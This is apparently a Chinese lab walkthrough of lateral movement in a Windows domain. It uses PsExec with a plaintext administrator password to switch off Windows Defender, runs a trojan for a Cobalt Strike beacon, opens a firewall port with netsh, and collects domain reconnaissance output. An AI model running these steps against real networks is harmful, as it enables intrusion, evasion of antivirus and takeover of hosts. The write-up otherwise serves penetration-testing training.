svchost.exe                   1104 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
                                   ProfSvc, Schedule, SENS, ShellHWDetection,
                                   Themes, UserManager, Winmgmt, wlidsvc,
                                   WpnService
svchost.exe                   1204 Wcmsvc
spoolsv.exe                   1628 Spooler
svchost.exe                   1672 DiagTrack
vmtoolsd.exe                  1712 VMTools
svchost.exe                   1772 StateRepository, tiledatamodelsvc
svchost.exe                   1784 LanmanServer
VGAuthService.exe             1792 VGAuthService
MsMpEng.exe                   1824 WinDefend
dllhost.exe                   2244 COMSysApp
msdtc.exe                     2364 MSDTC
WmiPrvSE.exe                  2956 N/A
RuntimeBroker.exe             3980 N/A
sihost.exe                    1624 N/A
svchost.exe                   1660 CDPUserSvc_6b7cd, OneSyncSvc_6b7cd
taskhostw.exe                 2464 N/A
ChsIME.exe                     396 N/A
explorer.exe                  3872 N/A
ShellExperienceHost.exe       3344 N/A
SearchUI.exe                  1392 N/A
vm3dservice.exe               3512 N/A
vmtoolsd.exe                  3656 N/A
ApplicationFrameHost.exe      2176 N/A
LogonUI.exe                    624 N/A
ChsIME.exe                    5056 N/A
LockAppHost.exe               4932 N/A
LockApp.exe                   1348 N/A
csrss.exe                     2432 N/A
winlogon.exe                  1812 N/A
dwm.exe                       1960 N/A
ChsIME.exe                    1228 N/A
RuntimeBroker.exe             4872 N/A
sihost.exe                    3372 N/A
svchost.exe                   1652 CDPUserSvc_5f77fd, OneSyncSvc_5f77fd
taskhostw.exe                 4412 N/A
explorer.exe                  3100 N/A
ChsIME.exe                     576 N/A
ShellExperienceHost.exe       5000 N/A
ServerManager.exe             3844 N/A
SearchUI.exe                  5052 N/A
vm3dservice.exe                308 N/A
cmd.exe                        380 N/A
conhost.exe                   2584 N/A
MpCmdRun.exe                  3328 N/A
PSEXESVC.exe                  3976 PSEXESVC
128to129.exe                  4480 N/A
conhost.exe                   3196 N/A
notepad.exe                   2220 N/A
notepad.exe                   4364 N/A
notepad.exe                   2104 N/A
cmd.exe                       4572 N/A
conhost.exe                     68 N/A
tasklist.exe                  3652 N/A



杀软信息

msmpeng.exe:windows defender
mpcmdrun.exe:windows defender

关闭Windows Defeder

上传

关闭

PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/DefenderSwitch.exe -off

结果

检查

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       316 N/A
csrss.exe                      384 N/A
wininit.exe                    480 N/A
csrss.exe                      488 N/A
winlogon.exe                   556 N/A
services.exe                   604 N/A
lsass.exe                      612 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe                    700 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    760 RpcEptMapper, RpcSs
dwm.exe                        844 N/A
svchost.exe                    908 NcbService, Netman, PcaSvc, StorSvc,
                                   TrkWks, UALSVC, wudfsvc
svchost.exe                    916 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe                    924 CDPSvc, EventSystem, FontCache,
                                   LicenseManager, netprofm, nsi, W32Time,
                                   WinHttpAutoProxySvc
svchost.exe                   1012 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                   1020 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                   1104 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
                                   ProfSvc, Schedule, SENS, ShellHWDetection,
                                   Themes, UserManager, Winmgmt, WpnService
svchost.exe                   1204 Wcmsvc
spoolsv.exe                   1628 Spooler
svchost.exe                   1672 DiagTrack
vmtoolsd.exe                  1712 VMTools
svchost.exe                   1772 StateRepository, tiledatamodelsvc
svchost.exe                   1784 LanmanServer
VGAuthService.exe             1792 VGAuthService
dllhost.exe                   2244 COMSysApp
msdtc.exe                     2364 MSDTC
WmiPrvSE.exe                  2956 N/A
RuntimeBroker.exe             3980 N/A
sihost.exe                    1624 N/A
svchost.exe                   1660 CDPUserSvc_6b7cd, OneSyncSvc_6b7cd
taskhostw.exe                 2464 N/A
ChsIME.exe                     396 N/A
explorer.exe                  3872 N/A
ShellExperienceHost.exe       3344 N/A
SearchUI.exe                  1392 N/A
vm3dservice.exe               3512 N/A
vmtoolsd.exe                  3656 N/A
ApplicationFrameHost.exe      2176 N/A
LogonUI.exe                    624 N/A
ChsIME.exe                    5056 N/A
LockAppHost.exe               4932 N/A
LockApp.exe                   1348 N/A
csrss.exe                     2432 N/A
winlogon.exe                  1812 N/A
dwm.exe                       1960 N/A
ChsIME.exe                    1228 N/A
RuntimeBroker.exe             4872 N/A
sihost.exe                    3372 N/A
svchost.exe                   1652 CDPUserSvc_5f77fd, OneSyncSvc_5f77fd
taskhostw.exe                 4412 N/A
explorer.exe                  3100 N/A
ChsIME.exe                     576 N/A
ShellExperienceHost.exe       5000 N/A
ServerManager.exe             3844 N/A
SearchUI.exe                  5052 N/A
vm3dservice.exe                308 N/A
cmd.exe                        380 N/A
conhost.exe                   2584 N/A
PSEXESVC.exe                  3976 PSEXESVC
128to129.exe                  4480 N/A
conhost.exe                   3196 N/A
cmd.exe                       4572 N/A
conhost.exe                     68 N/A
TrustedInstaller.exe          2192 TrustedInstaller
tasklist.exe                   180 N/A


杀软
无

上线CS

设置代理

参考
https://mp.weixin.qq.com/s/HwWR3-2IWFEp-tmSnNWDrA

生成木马

上传

复制到10.10.1.128的机器上

执行

PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/128to129tocs.exe

结果

失败、转发不成功

tomcat-web Beacon 添加转发规则

shell netsh advfirewall firewall add rule name="6160" protocol=TCP dir=in localport=6160 action=allow

结果

再次尝试

失败

还是不行!!!!

使用CS的psexec进行上线

上面我们使用CS的psexec进行上线10.10.1.128的域内主机的时候、我们使用的是反向连接的方式进行的、但是我们在后面的扫描中发现10.10.1.128机器是只开放445端口的、我们是只能利用正向连接的方式进行建立会话的、再次尝试

使用正向连接

成功上线cs

dc域内信息搜集

使用msf

meterpreter > ipconfig /all

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a8c
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  4
============
Name         : Intel(R) 82574L Gigabit Network Connection #2
Hardware MAC : 00:0c:29:76:60:d0
MTU          : 1500
IPv4 Address : 10.10.10.140            #域内网卡
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c5d:2340:1275:9b44
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  7
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:76:60:c6
MTU          : 1500
IPv4 Address : 10.10.1.128              #本机网卡
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::d142:345b:c480:4c70
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 23
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:180
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff




使用shell

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 FILESERVER                #主机名
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows 用户
Registered Organization:
Product ID:                00377-60000-00000-AA912
Original Install Date:     2020/11/4, 20:46:55
System Boot Time:          2022/2/8, 23:02:17
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
                           [02]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     2,047 MB
Available Physical Memory: 834 MB
Virtual Memory: Max Size:  2,815 MB
Virtual Memory: Available: 1,559 MB
Virtual Memory: In Use:    1,256 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    fbi.gov               #发现域控名称:fbi.gov
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB3200970
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.1.128
                                 [02]: fe80::d142:345b:c480:4c70
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet1
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.140
                                 [02]: fe80::c5d:2340:1275:9b44
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.




C:\Windows\system32>arp -a
arp -a

Interface: 10.10.10.140 --- 0x4
  Internet Address      Physical Address      Type
  10.10.10.1            00-50-56-c0-00-13     dynamic
  10.10.10.139          00-0c-29-37-c2-ee     dynamic    #域主机出现
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static

Interface: 10.10.1.128 --- 0x7
  Internet Address      Physical Address      Type
  10.10.1.129           00-0c-29-49-bb-5d     dynamic     #tomcat-web
  10.10.1.254           00-50-56-e8-81-6b     dynamic
  10.10.1.255           ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static


C:\>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : fileserver
   Primary Dns Suffix  . . . . . . . : fbi.gov
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : fbi.gov

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-76-60-C6
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::d142:345b:c480:4c70%8(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.1.128(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.1.254
   DHCPv6 IAID . . . . . . . . . . . : 50334761
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-8D-04-45-00-0C-29-76-60-C6
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-76-60-D0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::c5d:2340:1275:9b44%5(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.10.140(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 150998057
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-8D-04-45-00-0C-29-76-60-C6
   DNS Servers . . . . . . . . . . . : 10.10.10.139
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{8438E7C5-35B5-4521-9CCA-52E6E2A1F1F7}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes



使用cs

beacon> net computers            #域内主机信息(名称、域内ip)
[*] Tasked beacon to run net computers
[+] host called home, sent: 105062 bytes
[+] received output:
Computers:

 Server Name             IP Address                      
 -----------             ----------                      
 DC                      10.10.10.139      #dc域主机出现10.10.10.139
 FILESERVER              10.10.1.128

beacon> net dclist                  #域内主机列表
[*] Tasked beacon to run net dclist
[+] host called home, sent: 105059 bytes
[+] received output:
DCs:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
[-] Error: 6118

beacon> net domain                   #域名称
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
fbi.gov

beacon> net domain_controllers       #域主机信息
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 105071 bytes
[+] received output:
Domain Controllers:

 Server Name             IP Address                      
 -----------             ----------                      
 DC                      10.10.10.139     #dc主机信息

beacon> net domain_trusts         #域主机状态
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 105066 bytes
[+] received output:
List of domain trusts:

    0: FBI fbi.gov (Forest tree root) (Primary Domain) (Native)

beacon> net group                #域内分组
[*] Tasked beacon to run net group on localhost
[+] host called home, sent: 105058 bytes
[+] received output:
Groups:

 Name                                             Comment
 ----                                             -------

beacon> net localgroup              #当前机器在域内所属组
[*] Tasked beacon to run net localgroup on localhost
[+] host called home, sent: 105063 bytes
[+] received output:
Local groups for \\localhost:

 Name                                             Comment
 ----                                             -------

beacon> net logons                 #域内登录用户
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 105059 bytes
[+] received output:
Logged on users at \\localhost:

FILESERVER\Administrator
FBI\FILESERVER$
FBI\FILESERVER$
FBI\FILESERVER$

beacon> net sessions                 #域内连接会话
[*] Tasked beacon to run net sessions on localhost
[+] host called home, sent: 105061 bytes
[+] received output:
Sessions for \\localhost:

 Computer               User name            Active (s)     Idle (s)
 --------               ---------            ----------     --------
 \\[fe80::1479:3673:41d4:fdd7] Administrator        760            1
 \\[::1]                FILESERVER$          5              0

beacon> net share                   #域控开启的share方式
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 105058 bytes
[+] received output:
Shares at \\localhost:

 Share name                       Comment
 ----------                       -------
 ADMIN$                           远程管理
 C$                               默认共享
 IPC$                             远程 IPC

beacon> net time                   #域主机时间
[*] Tasked beacon to run net time on localhost
[+] host called home, sent: 105057 bytes
[+] received output:
Current time at \\localhost is 2/10/2022 00:06:33

beacon> net user                    #域主机用户
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 105057 bytes
[+] received output:
Users for \\localhost:

Administrator (admin)
DefaultAccount
Guest

beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 105057 bytes
[+] received output:
List of hosts:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
[-] Error: 6118


发现域主机(10.10.10.139)

锐单商城拥有海量元器件数据手册IC替代型号,打造电子元器件IC百科大全!

相关文章